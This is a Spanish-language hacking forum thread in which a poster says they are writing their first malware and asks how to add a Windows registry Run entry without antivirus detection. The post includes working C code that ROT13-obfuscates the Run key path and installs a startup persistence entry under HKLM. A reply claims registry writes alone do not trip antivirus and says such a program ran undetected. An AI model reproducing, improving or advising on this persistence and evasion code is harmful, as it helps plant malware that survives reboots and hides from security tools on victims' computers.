comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Duda entrada en el registro

  • 1 Respuestas
  • 1413 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dlqlplb

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Junio 28, 2012, 09:25:48 pm »
Estoy empezando a programar mi primer malware, y me he topado con un detalle al momento de escribir en el registro de windows, estoy usando una funcion muy vieja  que encontre y es por eso que el antivirus me lo detecta muy rapido.
 quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
 tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?

       
Código: C
  1.        HKEY startup;
  2.         char key[256];          
  3.         k(key,"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
  4.         RegCreateKeyEx(HKEY_LOCAL_MACHINE , key, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &startup, NULL);
  5.         RegSetValueEx(startup, regname, 0, REG_SZ, (BYTE *)installpath, strlen(installpath));          
  6.         RegCloseKey(startup);
  7.      
lib.h
     
Código: C
  1. #define WIN32_LEAN_AND_MEAN
  2. #include <windows.h>
  3. #include <string.h>
  4.  
  5.  
  6. char k1(char c);
  7. void k(char *buf, const char *in);
  8.  
  9. char *xstrchr(const char *str, char ch);
  10.  
  11.  
  12. char k1(char c)
  13. {
  14. char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
  15. char l[] = "abcdefghijklmnopqrstuvwxyz";
  16. char *p;
  17.  
  18. if ((p = xstrchr(u, c)) != NULL)
  19. return u[((p-u) + 13) % 26];
  20. else if ((p = xstrchr(l, c)) != NULL)
  21. return l[((p-l) + 13) % 26];
  22. else
  23. return c;
  24. }
  25.  
  26. void k(char *buf, const char *in)
  27. {
  28. while (*in)
  29. *buf++ = k1(*in++);
  30. *buf = 0;
  31. }
  32.  
  33. char *xstrchr(const char *str, char ch)
  34. {
  35. while (*str && *str != ch) str++;
  36. return (*str == ch) ? (char *)str : NULL;
  37. }
  38.  
  39.  
  40.      


c++
« Última modificación: Agosto 19, 2014, 09:40:16 pm por Expermicid »

Desconectado #define

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
  • Por supuesto, el proyecto estará para mañana...
    • Ver Perfil
    • Email
« Respuesta #1 en: Enero 17, 2014, 05:58:23 pm »
Buenas dlqlplb! Bueno 100% seguro no estoy, pero sí un 99%... Todos los códigos de malware que he visto y que añaden una entrada al registro para que el programa incicie cada vez que arranque Winvirus, lo hacen igual. Lo que quiero decir con eso es que no es la escritura en el registro lo que hace saltar al antivirus, sino el código o funcionamiento del programa. Es más, hay muchísimos programas que escriben entradas en el registro (cada vez que instalas un programa, por ejemplo), que no tienen por qué ser dañinos. Por tanto hecho de escribir en el registro no indica nada. Para dar fuerza a lo que digo, te cuento que yo ejecuté uno de estos programas en mi propio ordenador con el antivirus con protección en tiempo real y aquello iba como Pedro por su casa hahahaha, ni alerta ni nada. Y efectivamente luego abrí el registro y la entrada estaba allí, tan inocente jeje.

Saludos! Digo lo de siempre, si me equivoco, por favor, que alguien me corrija.

Edito porque no tengo ni idea de qué tecla pulsé y se envió el mensaje a medias. :'(

Quiero hacer la observación de que me he leído las normas, tarde, pero cuando las he visto, por eso he borrado alguno de los mensajes que había escrito. Pone que no se responda si han pasado 120 días desde la última respuesta, pero en este caso no hubo respuesta. Por ello lo dejo, si algún moderador o administrador desea quitarlo estáis en vuestro derecho.
« Última modificación: Enero 17, 2014, 07:16:00 pm por #define »
¿Os habéis parado un segundo a pensar qué podría haber pasado si Dennis Ritchie y Ken Thompson no hubieran hecho lo que hicieron o no hubieran existido?

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 8400
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2298
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1716
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 3200
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 3136
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made